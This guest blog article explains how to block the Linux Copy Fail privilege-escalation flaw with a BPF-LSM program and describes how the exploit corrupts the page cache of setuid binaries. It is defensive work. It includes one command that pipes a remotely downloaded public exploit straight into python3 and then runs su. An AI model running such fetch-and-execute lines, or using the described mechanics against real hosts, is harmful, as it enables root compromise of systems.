Fixing Copy Fail without Reboot

Guest article by Mateusz Gierblinski.

Copy Fail is CVE-2026-31431, a high-severity Linux kernel local privilege escalation vulnerability. It affects the kernel crypto subsystem, specifically the algif_aead / AF_ALG interface. An unprivileged local user can abuse it to corrupt the in-memory page cache of readable files, including setuid binaries, and potentially escalate to root. It is not remotely exploitable by itself, but it is serious on systems where users, containers, CI/CD jobs, or workloads can execute code locally.

The following steps are inspired by the excellent work done by Cloudflare; all I did was make the process more manageable. All kudos go to them!

Steps to reproduce Cloudflare’s mitigation

Cloudflare did two things:

  1. Visibility first: identify legitimate AF_ALG users.
  2. Enforcement second: attach a BPF-LSM program to deny socket_bind for non-allowlisted AF_ALG callers.

On stock RHEL 8.9, this exact BPF-LSM approach is likely to be unavailable: Red Hat’s BPF feature table for RHEL 8.9, which is generated from bpftool feature output, does not list BPF-LSM as generally available. The steps below follow what Cloudflare did and assume your kernel supports BPF-LSM, so verify that first.

Verify kernel support

uname -a
cat /etc/redhat-release

grep -E 'CONFIG_BPF_LSM|CONFIG_BPF_SYSCALL|CONFIG_DEBUG_INFO_BTF|CONFIG_LSM' \
  /boot/config-$(uname -r) || true

cat /sys/kernel/security/lsm 2>/dev/null || true

sudo bpftool feature probe kernel | grep -A5 -i 'program_type lsm' || true

You need something equivalent to:

CONFIG_BPF_LSM=y
CONFIG_BPF_SYSCALL=y
CONFIG_DEBUG_INFO_BTF=y

bpf also needs to appear in the active LSM list, which you can print with:

cat /sys/kernel/security/lsm

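If the kernel supports BPF-LSM but bpf is not in the active list, add it to the kernel command line. This one change does require a reboot. Keep the LSMs your system already reports and append bpf: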

sudo grubby --update-kernel=ALL --args="lsm=lockdown,yama,integrity,selinux,bpf"
sudo reboot

After reboot:

cat /sys/kernel/security/lsm
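
If you have to repeat these checks on several hosts, the two text checks above can be scripted. The following is only a sketch: the function names are my own, and it assumes the config file at /boot/config-<release> and the securityfs LSM list are readable on your system.

```python
import re

REQUIRED_OPTIONS = ("CONFIG_BPF_LSM", "CONFIG_BPF_SYSCALL", "CONFIG_DEBUG_INFO_BTF")


def missing_kernel_options(config_text, required=REQUIRED_OPTIONS):
    """Return the required options that are not set to 'y' in a kernel config."""
    enabled = set(re.findall(r"^(CONFIG_\w+)=y$", config_text, flags=re.MULTILINE))
    return [opt for opt in required if opt not in enabled]


def bpf_lsm_active(lsm_list_text):
    """True if 'bpf' is one of the comma-separated active LSMs."""
    return "bpf" in [name.strip() for name in lsm_list_text.split(",")]


if __name__ == "__main__":
    import platform
    from pathlib import Path

    checks = (
        ("missing options", Path(f"/boot/config-{platform.release()}"), missing_kernel_options),
        ("bpf LSM active", Path("/sys/kernel/security/lsm"), bpf_lsm_active),
    )
    for label, path, check in checks:
        try:
            print(f"{label}: {check(path.read_text())}")
        except OSError as exc:
            # Hypothetical fallback message; adjust to your own tooling.
            print(f"{label}: could not read {path} ({exc})")
```

An empty "missing options" list together with "bpf LSM active: True" corresponds to the state the rest of this guide assumes.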

Install build dependencies

On RHEL-like systems:

sudo dnf install -y \
  clang llvm make gcc git bpftool \
  elfutils-libelf-devel zlib-devel \
  kernel-devel kernel-headers

Check BTF exists:

ls -l /sys/kernel/btf/vmlinux

On my default RHEL 8.9 install I receive the following output:

-r--r--r--. 1 root root 4237195 May  9 12:40 /sys/kernel/btf/vmlinux

Create a working directory

mkdir -p ~/copyfail-bpf-lsm
cd ~/copyfail-bpf-lsm

Generate vmlinux.h

bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

Create the BPF-LSM program

Create:

vim copyfail_block.bpf.c

And paste:

// copyfail_block.bpf.c
#include "vmlinux.h"

#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>

char LICENSE[] SEC("license") = "GPL";

#ifndef AF_ALG
#define AF_ALG 38
#endif

#ifndef EPERM
#define EPERM 1
#endif

struct sockaddr_alg_min {
    unsigned short salg_family;
    unsigned char  salg_type[14];
    unsigned int   salg_feat;
    unsigned int   salg_mask;
    unsigned char  salg_name[64];
};

static __always_inline int streq_prefix_4(const unsigned char *s, const char *p)
{
    return s[0] == p[0] &&
           s[1] == p[1] &&
           s[2] == p[2] &&
           s[3] == p[3];
}

/*
 * Demo allow-list by process comm.
 *
 * Cloudflare says they checked the calling binary path against an allowlist.
 * For a minimal reproducible lab, comm-based allow-listing is easier, but a
 * process can rename itself with prctl(PR_SET_NAME), so do not rely on comm
 * matching outside a lab.
 *
 * Replace "allowed-afalg" with the process name you want to allow.
 */
static __always_inline int caller_is_allowed(void)
{
    char comm[16];

    bpf_get_current_comm(&comm, sizeof(comm));

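    /*
     * Exact match: the terminating NUL check stops longer names such as
     * "allowed-afalgX" from passing as a prefix match.
     */
    if (comm[0] == 'a' &&
        comm[1] == 'l' &&
        comm[2] == 'l' &&
        comm[3] == 'o' &&
        comm[4] == 'w' &&
        comm[5] == 'e' &&
        comm[6] == 'd' &&
        comm[7] == '-' &&
        comm[8] == 'a' &&
        comm[9] == 'f' &&
        comm[10] == 'a' &&
        comm[11] == 'l' &&
        comm[12] == 'g' &&
        comm[13] == '\0')
        return 1;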

    return 0;
}

/*
 * LSM hook:
 *   socket_bind(struct socket *sock, struct sockaddr *address, int addrlen)
 *
 * BPF-LSM programs receive ret as the last argument.
 */
SEC("lsm/socket_bind")
int BPF_PROG(block_copyfail_afalg_bind,
             struct socket *sock,
             struct sockaddr *address,
             int addrlen,
             int ret)
{
    struct sockaddr_alg_min alg = {};

    if (ret != 0)
        return ret;

    if (!address)
        return 0;

    if (addrlen < sizeof(unsigned short))
        return 0;

    bpf_probe_read_kernel(&alg, sizeof(alg), address);

    if (alg.salg_family != AF_ALG)
        return 0;

    /*
     * Cloudflare blocked AF_ALG socket_bind unless the binary was allow-listed.
     * The exploit path binds to type "aead", algorithm:
     *   authencesn(hmac(sha256),cbc(aes))
     *
     * This version blocks all non-allowlisted AF_ALG binds.
     */
    if (caller_is_allowed())
        return 0;

    return -EPERM;
}

This mirrors the Cloudflare logic:

socket_bind called
  if not AF_ALG → allow
  if caller allowlisted → allow
  otherwise → deny

Cloudflare’s article says their production version checked the socket family, compared the calling binary path to an allow-list, and denied everything else.
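
To reason about the policy without loading anything into the kernel, the same decision can be modelled in a few lines of Python. This is a sketch of the logic only, not the BPF program: socket_bind_decision and the allow-list set are illustrative names, and the comm strings in the usage line are made up.

```python
AF_INET = 2
AF_ALG = 38  # same value the BPF program defines
EPERM = 1


def socket_bind_decision(family, comm, allowlist):
    """Mirror the hook's logic: 0 allows the bind, -EPERM denies it."""
    if family != AF_ALG:
        return 0  # not AF_ALG: never interfere
    if comm in allowlist:
        return 0  # exact name match, not a prefix match
    return -EPERM


if __name__ == "__main__":
    allow = {"allowed-afalg"}
    for family, comm in ((AF_INET, "nginx"), (AF_ALG, "allowed-afalg"), (AF_ALG, "python3")):
        print(family, comm, socket_bind_decision(family, comm, allow))
```

Keep in mind that the kernel truncates comm to 15 characters, so two binaries with long names can collide on the same comm value.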

Compile the BPF object

clang \
  -O2 -g -target bpf \
  -D__TARGET_ARCH_x86 \
  -I. \
  -c copyfail_block.bpf.c \
  -o copyfail_block.bpf.o

You might see an error similar to this:

copyfail_block.bpf.c:4:10: fatal error: 'bpf/bpf_helpers.h' file not found
    4 | #include <bpf/bpf_helpers.h>
      |          ^~~~~~~~~~~~~~~~~~~
1 error generated.

That means the libbpf development headers are missing. Install them with:

sudo dnf install -y libbpf-devel

If dnf cannot find libbpf-devel, enable the CodeReady Builder repository first and rerun the install:

sudo subscription-manager repos \
  --enable codeready-builder-for-rhel-8-x86_64-rpms

Generate the libbpf skeleton

bpftool gen skeleton copyfail_block.bpf.o > copyfail_block.skel.h

The kernel docs describe this skeleton flow: compile the BPF object, generate a skeleton with bpftool, then load and attach it from userspace.

Create the userspace loader

Create:

vim copyfail_block.c

Paste:

// copyfail_block.c
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <bpf/libbpf.h>

#include "copyfail_block.skel.h"

static volatile sig_atomic_t exiting = 0;

static void sig_handler(int sig)
{
    exiting = 1;
}

int main(void)
{
    struct copyfail_block_bpf *skel;
    int err;

    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);

    libbpf_set_strict_mode(LIBBPF_STRICT_ALL);

    skel = copyfail_block_bpf__open();
    if (!skel) {
        fprintf(stderr, "Failed to open BPF skeleton\n");
        return 1;
    }

    err = copyfail_block_bpf__load(skel);
    if (err) {
        fprintf(stderr, "Failed to load BPF skeleton: %d\n", err);
        goto cleanup;
    }

    err = copyfail_block_bpf__attach(skel);
    if (err) {
        fprintf(stderr, "Failed to attach BPF program: %d\n", err);
        goto cleanup;
    }

    printf("Copy Fail AF_ALG BPF-LSM mitigation loaded.\n");
    printf("Press Ctrl+C to unload.\n");

    while (!exiting)
        sleep(1);

cleanup:
    copyfail_block_bpf__destroy(skel);
    return err < 0 ? -err : err;
}

Build the loader

gcc -O2 -g \
  -I. \
  copyfail_block.c \
  -o copyfail_block \
  -lbpf -lelf -lz

Run the mitigation

sudo ./copyfail_block

Leave it running.

In another terminal, test the safe Cloudflare check:

python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0);
s.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));'

Expected output:

Traceback (most recent call last):
  File "<string>", line 1, in <module>
PermissionError: [Errno 1] Operation not permitted

Cloudflare used this exact style of safe validation: on a mitigated host, the bind fails with PermissionError, or FileNotFoundError if the module-removal mitigation is active.
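
If you want to run that check from a script and get a readable verdict instead of a traceback, something like the following could work. It is a sketch under my own naming (try_afalg_bind and classify are not from Cloudflare’s article) and it only distinguishes the outcomes described above.

```python
import socket

ALG = ("aead", "authencesn(hmac(sha256),cbc(aes))")


def try_afalg_bind():
    """Attempt the same AF_ALG bind as the one-liner above (Linux only)."""
    with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as s:
        s.bind(ALG)


def classify(bind_attempt=try_afalg_bind):
    """Map the outcome of a bind attempt to a short verdict string."""
    try:
        bind_attempt()
    except PermissionError:
        return "blocked: bind denied (policy active)"
    except FileNotFoundError:
        return "blocked: algorithm or module unavailable"
    except (OSError, AttributeError) as exc:
        # Other errors, or a platform without AF_ALG, tell us nothing definite.
        return f"inconclusive: {exc}"
    return "reachable: AF_ALG AEAD bind succeeded"


if __name__ == "__main__":
    print(classify())
```

The bind attempt is passed in as a parameter so the classification can be exercised with stand-in callables on a machine where you do not want to touch AF_ALG at all.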

Visibility step, Cloudflare-style

Before enforcement, Cloudflare monitored who was creating AF_ALG sockets across the fleet, then enforced only after confirming the legitimate users.

For a single host, you can do a rough audit with bpftrace:

sudo dnf install -y bpftrace

Trace socket() calls where the domain is AF_ALG:

sudo bpftrace -e '
tracepoint:syscalls:sys_enter_socket
/args->family == 38/
{
  printf("%s pid=%d called socket(AF_ALG)\n", comm, pid);
}'

Run this for a while and note legitimate callers.

Then update the allow-list in the BPF program.
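
If you save the bpftrace output to a file, a short script can turn it into a per-process summary to review before you touch the allow-list. This sketch assumes the exact printf format used in the bpftrace one-liner above; the process names in the sample are invented.

```python
import re
from collections import Counter

# Matches the lines printed by the bpftrace one-liner above.
LINE = re.compile(r"^(?P<comm>.+) pid=(?P<pid>\d+) called socket\(AF_ALG\)$")


def count_callers(lines):
    """Count AF_ALG socket() calls per process name, ignoring other lines."""
    counts = Counter()
    for line in lines:
        match = LINE.match(line.strip())
        if match:
            counts[match.group("comm")] += 1
    return counts


if __name__ == "__main__":
    sample = [
        "Attaching 1 probe...",
        "exampled pid=812 called socket(AF_ALG)",
        "exampled pid=812 called socket(AF_ALG)",
        "other-tool pid=77 called socket(AF_ALG)",
    ]
    for comm, hits in count_callers(sample).most_common():
        print(f"{hits:6d}  {comm}")
```

To use it on real data, replace the sample list with the lines of your saved trace, for example by iterating over an open file.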

Productionize with systemd

Create:

sudo vim /etc/systemd/system/copyfail-bpf-lsm.service

Paste:

[Unit]
Description=Copy Fail AF_ALG BPF-LSM mitigation
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/sbin/copyfail_block
Restart=always
RestartSec=3

[Install]
WantedBy=multi-user.target

Install the binary:

sudo install -m 0755 copyfail_block /usr/local/sbin/copyfail_block

Enable it:

sudo systemctl daemon-reload
sudo systemctl enable --now copyfail-bpf-lsm.service
sudo systemctl status copyfail-bpf-lsm.service

Validate:

python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0);
s.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));'

Expected:

PermissionError: [Errno 1] Operation not permitted

Fallback: module-removal mitigation

Cloudflare first considered disabling the vulnerable module:

echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead 2>/dev/null || true

They moved to BPF-LSM because removing the module could break legitimate users of the kernel crypto API.

Validate:

python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0);
s.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));'

Expected:

FileNotFoundError

Or:

PermissionError: [Errno 1] Operation not permitted
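
Besides the bind test, you may want to confirm that the module is really unloaded and that the install override is in place. The helpers below are a sketch that parses text you pass in (the contents of /proc/modules and of the modprobe.d file created above); the function names are my own.

```python
def module_loaded(proc_modules_text, name="algif_aead"):
    """True if `name` is listed as a loaded module in /proc/modules content."""
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] == name:
            return True
    return False


def install_rule_present(modprobe_conf_text, name="algif_aead"):
    """True if the text contains an 'install <name> <command>' override."""
    for line in modprobe_conf_text.splitlines():
        fields = line.split("#", 1)[0].split()  # drop trailing comments
        if len(fields) >= 3 and fields[0] == "install" and fields[1] == name:
            return True
    return False


if __name__ == "__main__":
    from pathlib import Path

    try:
        print("algif_aead loaded:", module_loaded(Path("/proc/modules").read_text()))
    except OSError as exc:
        print("could not read /proc/modules:", exc)
```

The state you are aiming for is module_loaded returning False and install_rule_present returning True for /etc/modprobe.d/disable-algif.conf.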

Testing exploit after mitigation

On my RHEL 8.9 host, the public exploit now fails with the following output:

[mto@rhel ~]$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   3464      0 --:--:-- --:--:-- --:--:--  3464
Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
PermissionError: [Errno 1] Operation not permitted

Conclusion

Copy Fail works because an unprivileged process can abuse the Linux kernel crypto userspace API, AF_ALG, together with splice(), to turn a normally read-only page-cache page into a writable destination buffer inside the kernel crypto path.

The exploit does not need to write to the target file on disk. Instead, it corrupts the page cache copy of a readable file, commonly a SUID-root binary such as /usr/bin/su. When that binary is executed afterward, the kernel may execute the corrupted cached version, causing attacker-controlled code to run with root privileges.

What you did with the Cloudflare-style mitigation was:

You blocked untrusted userspace from reaching the vulnerable AF_ALG AEAD socket_bind() path.

The vulnerable kernel code is still present until the kernel is patched, but the exploit can no longer reach the primitive it needs.

The components involved

AF_ALG

AF_ALG is Linux’s userspace interface to the kernel crypto API.

It lets a userspace process do things like:

socket(AF_ALG, ...)
bind(..., "aead", "authencesn(hmac(sha256),cbc(aes))")
setsockopt(...)
accept(...)
sendmsg(...)
splice(...)

For Copy Fail, the important crypto algorithm is:

authencesn(hmac(sha256),cbc(aes))

The exploit relies on binding to this algorithm, setting a key, and accepting a request socket, none of which requires privileges.


algif_aead

algif_aead is the kernel module/interface that exposes AEAD crypto algorithms through AF_ALG.

AEAD means Authenticated Encryption with Associated Data.

The vulnerability lives in this area. CERT-EU describes Copy Fail as a local privilege escalation flaw in the Linux kernel’s algif_aead module, the AEAD socket interface of the kernel userspace crypto API.


splice()

splice() moves data between file descriptors through the kernel, often avoiding a userspace copy.

That is normally a performance optimization.

In this exploit chain, splice() is used to feed page-cache-backed file pages into the crypto operation.

So instead of the crypto code operating only on ordinary user-provided memory, it ends up operating on kernel page-cache pages belonging to a real file.


Page cache

The page cache is the kernel’s in-memory cache of file contents.

Important distinction:

File on disk:
  /usr/bin/su remains unchanged

Page cache:
  in-memory cached copy of /usr/bin/su gets corrupted

That is why traditional file-integrity checks may miss the attack: the file on disk may still hash cleanly, while the cached copy used for execution has been modified.

Sysdig describes the bug as allowing unintended writes into page-cache memory via AF_ALG sockets and splice().

What the exploit primitive gives the attacker

The core primitive is approximately:

Controlled 4-byte write
to a chosen offset
inside a page-cache-backed file page
from an unprivileged process

CERT-EU describes the impact as an unprivileged local user being able to perform a controlled 4-byte write to an arbitrary page-cache-backed page by chaining AF_ALG with splice().

That is small, but powerful.

A 4-byte write is enough if you can repeat it many times.

So the exploit repeatedly writes small chunks into the cached copy of a target executable.
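
To see why such a small write is enough, here is a toy model in plain Python. It has nothing to do with the kernel: a bytearray stands in for a cached page, and plan_writes and apply_writes are illustrative names. It only shows that N fixed-width writes at increasing offsets add up to an arbitrary byte sequence.

```python
def plan_writes(data, base_offset, width=4):
    """Split data into (offset, chunk) pairs of exactly `width` bytes.

    The last chunk is zero-padded, since the modelled primitive always
    writes a full 4 bytes.
    """
    padded = data + b"\x00" * (-len(data) % width)
    return [(base_offset + i, padded[i:i + width]) for i in range(0, len(padded), width)]


def apply_writes(page, writes):
    """Apply each small write to a bytearray standing in for a cached page."""
    for offset, chunk in writes:
        page[offset:offset + len(chunk)] = chunk
    return page


if __name__ == "__main__":
    writes = plan_writes(b"ABCDEFGHIJ", base_offset=8)
    page = apply_writes(bytearray(32), writes)
    print(len(writes), "writes ->", bytes(page))
```

The number of writes grows linearly with the size of the data, which is why the real exploit has to repeat the primitive many times.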

Why /usr/bin/su is commonly targeted

The exploit often targets a SUID-root binary such as:

/usr/bin/su

A SUID-root binary runs with effective UID 0 when executed.

Normally, an unprivileged user cannot modify /usr/bin/su because it is owned by root and protected by filesystem permissions.

But Copy Fail does not modify the file through normal write permissions.

Instead:

Read /usr/bin/su

Get its pages into page cache

Use AF_ALG + splice bug to corrupt selected cached pages

Execute /usr/bin/su

Kernel executes corrupted cached content

Payload runs with SUID-root privileges

Sysdig’s analysis describes exactly this style of chain: corrupting the page cache backing setuid binaries and then executing the patched binary to gain root.

The vulnerable data-flow

The exploit is not “magic root.” It is a very specific kernel data-flow bug.

At a high level:

User process
    |
    | creates AF_ALG socket
    v
algif_aead crypto interface
    |
    | bind to authencesn(hmac(sha256),cbc(aes))
    v
AEAD request object
    |
    | splice() feeds file-backed pages into request
    v
scatterlist contains page-cache pages
    |
    | authencesn writes 4 bytes of scratch/temporary data
    v
write lands in page cache

The root cause is that an optimization allowed page-cache pages to become part of a writable destination scatterlist. CERT-EU says the flaw originates from an in-place optimization introduced in 2017 that allows page-cache pages to be placed into a writable destination scatterlist.

Sysdig gives the more detailed version: algif_aead exposes AEAD ciphers via AF_ALG; the in-place optimization causes source and destination scatterlists to overlap; when userspace feeds the socket through splice(), the tag pages can reference page-cache data; then authencesn(...) performs a four-byte write that lands inside the spliced file’s cached data.

Why the crypto operation writes attacker-controlled data

The specific algorithm matters:

authencesn(hmac(sha256),cbc(aes))

The authencesn path performs a small internal rearrangement/write involving associated data.

Public analyses describe the exploit as arranging the AEAD parameters so that bytes controlled through the message metadata become the 4-byte value written into the target page-cache location. Cloudflare summarizes the construction as using sendmsg() with AAD bytes 4-7 containing the desired shellcode chunk, then using splice() so assoclen + cryptlen targets the desired offset.

So the attacker controls:

Thing             Why it matters
Target file       Usually a readable SUID binary
Target offset     Where the 4-byte write lands
4-byte value      The data written into the cached executable
Repetition count  Allows building a larger payload 4 bytes at a time

Why this bypasses normal permissions

Normally, Linux enforces:

Can this user write to /usr/bin/su?
  No → deny

But Copy Fail avoids the ordinary file write path.

The exploit abuses a kernel-internal crypto/write path that accidentally treats page-cache-backed file pages as writable output buffers.

So the permission check being bypassed is essentially:

The attacker cannot write the file,
but the kernel crypto code accidentally writes into the cached file page on
their behalf.

This is why it is so dangerous.

The attacker only needs local unprivileged access and read access to the target file.

Why the file on disk may remain unchanged

The corruption happens in memory:

Disk inode/data blocks:
  unchanged

Page cache:
  modified

Execution path:
  may use the modified cached page

If you run a disk-based checksum tool, it may read the real file from disk or compare metadata and conclude that nothing changed, depending on cache state and tooling behavior.

The key point is:

The attack poisons what the kernel will execute, not necessarily what is stored permanently on disk.

That is similar in spirit to previous “page cache corruption” style bugs, but the path here is through AF_ALG, algif_aead, and splice().
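
One way to make the disk-versus-cache distinction tangible is to hash the same file twice: once through ordinary reads, which are served from the page cache, and once with O_DIRECT, which asks the kernel to bypass the cache. This is a rough sketch rather than a detection tool. It assumes a filesystem that supports O_DIRECT (the function returns None where it does not), and a mismatch is only a hint that deserves a closer look.

```python
import hashlib
import mmap
import os

CHUNK = 1 << 20  # 1 MiB, a multiple of common logical block sizes


def hash_cached(path):
    """SHA-256 of the file as seen through ordinary (page-cache) reads."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            digest.update(block)
    return digest.hexdigest()


def hash_direct(path):
    """SHA-256 via O_DIRECT reads, or None where O_DIRECT is unsupported."""
    flag = getattr(os, "O_DIRECT", None)
    if flag is None:
        return None
    buf = mmap.mmap(-1, CHUNK)  # anonymous mappings are page-aligned
    try:
        fd = os.open(path, os.O_RDONLY | flag)
    except OSError:
        buf.close()
        return None
    digest = hashlib.sha256()
    try:
        while True:
            n = os.readv(fd, [buf])
            digest.update(buf[:n])
            if n < CHUNK:  # a short read means end of file
                break
    except OSError:
        return None
    finally:
        os.close(fd)
        buf.close()
    return digest.hexdigest()


if __name__ == "__main__":
    target = "/usr/bin/su"
    print("cached:", hash_cached(target))
    print("direct:", hash_direct(target))
```

On a healthy host both values should match. Comparing against the package manager’s recorded checksum is a useful third data point.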

What the RHEL mitigation changed

The BPF-LSM program attaches to the kernel’s LSM hook for socket binding:

lsm/socket_bind

The exploit needs this operation to succeed:

AF_ALG socket bind to authencesn(hmac(sha256),cbc(aes))

The mitigation checks each socket bind attempt and denies AF_ALG binds unless the caller is allowlisted.

Conceptually:

Process calls bind()
    |
    v
Kernel reaches socket_bind LSM hook
    |
    v
Your BPF-LSM program runs
    |
    +-- Is this AF_ALG?
        |
        +-- No  → allow
        |
        +-- Yes → is caller allowlisted?
                |
                +-- Yes → allow
                |
                +-- No  → return -EPERM

So after mitigation:

Exploit creates AF_ALG socket

Exploit tries to bind to vulnerable AEAD algorithm

BPF-LSM returns -EPERM

bind() fails

No AEAD request socket

No splice into crypto pipeline

No page-cache write primitive

No privilege escalation through this chain

That is why you see:

PermissionError: [Errno 1] Operation not permitted

That means your policy blocked the exploit at the required setup stage.